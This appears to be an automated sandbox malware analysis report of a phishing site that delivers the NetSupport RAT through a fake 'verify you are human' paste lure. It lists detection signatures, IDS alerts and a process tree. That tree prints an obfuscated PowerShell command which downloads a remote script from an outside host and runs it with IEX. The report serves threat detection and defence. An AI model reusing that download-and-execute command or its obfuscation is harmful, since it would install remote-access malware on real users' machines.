Edit tour
Windows
Analysis Report
https://inspyrehomedesign.com
Overview
Detection
NetSupport RAT
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Classification
- System is w10x64_ra
- chrome.exe (PID: 2200 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6808 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2052 --fi eld-trial- handle=193 2,i,138965 9103431353 991,142397 8929721548 7366,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6384 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://inspy rehomedesi gn.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 6584 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- notepad.exe (PID: 7676 cmdline:
"C:\Window s\system32 \notepad.e xe" MD5: 27F71B12CB585541885A31BE22F61C83)
- mshta.exe (PID: 7816 cmdline:
"C:\Window s\system32 \mshta.exe " https:// inspyrehom edesign.co m/Ray-veri fy.html # ? ''Veri fy you are human - R ay Verific ation ID: 7940'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7916 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='(New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //traverse cityspring break.com/ o/o.png'') ';$TC=I`E` X ($c1,$c4 ,$c3 -Join '')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 8088 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - cmd.exe (PID: 8112 cmdline:
"C:\Window s\system32 \cmd.exe" /c attrib +h C:\User s\user\App Data\Roami ng\fzxYFa MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - attrib.exe (PID: 8132 cmdline:
attrib +h C:\Users\u ser\AppDat a\Roaming\ fzxYFa MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - client32.exe (PID: 7056 cmdline:
"C:\Users\ user\AppDa ta\Roaming \fzxYFa\cl ient32.exe " MD5: EE75B57B9300AAB96530503BFAE8A2F2)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 19 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 3 entries |
System Summary |
---|
Source: | Author: Michael Haag: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Remote Access Functionality |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-28T19:51:51.960037+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:51:51.960037+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:51:52.180340+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:51:52.180340+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:51:54.496668+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:51:54.496668+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:01.359070+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:01.359070+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:01.517999+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:01.517999+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:02.264198+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:02.264198+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:02.426763+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:02.426763+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:03.536692+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:03.536692+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49717 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:04.527451+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49720 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:04.527451+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49720 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:10.574402+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49722 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:10.574402+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49722 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:11.040795+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49722 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:11.040795+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49722 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:11.790064+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49722 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:52:11.790064+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49722 | 166.1.160.211 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
Phishing |
---|
Source: | LLM: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Image file has PE prefix: |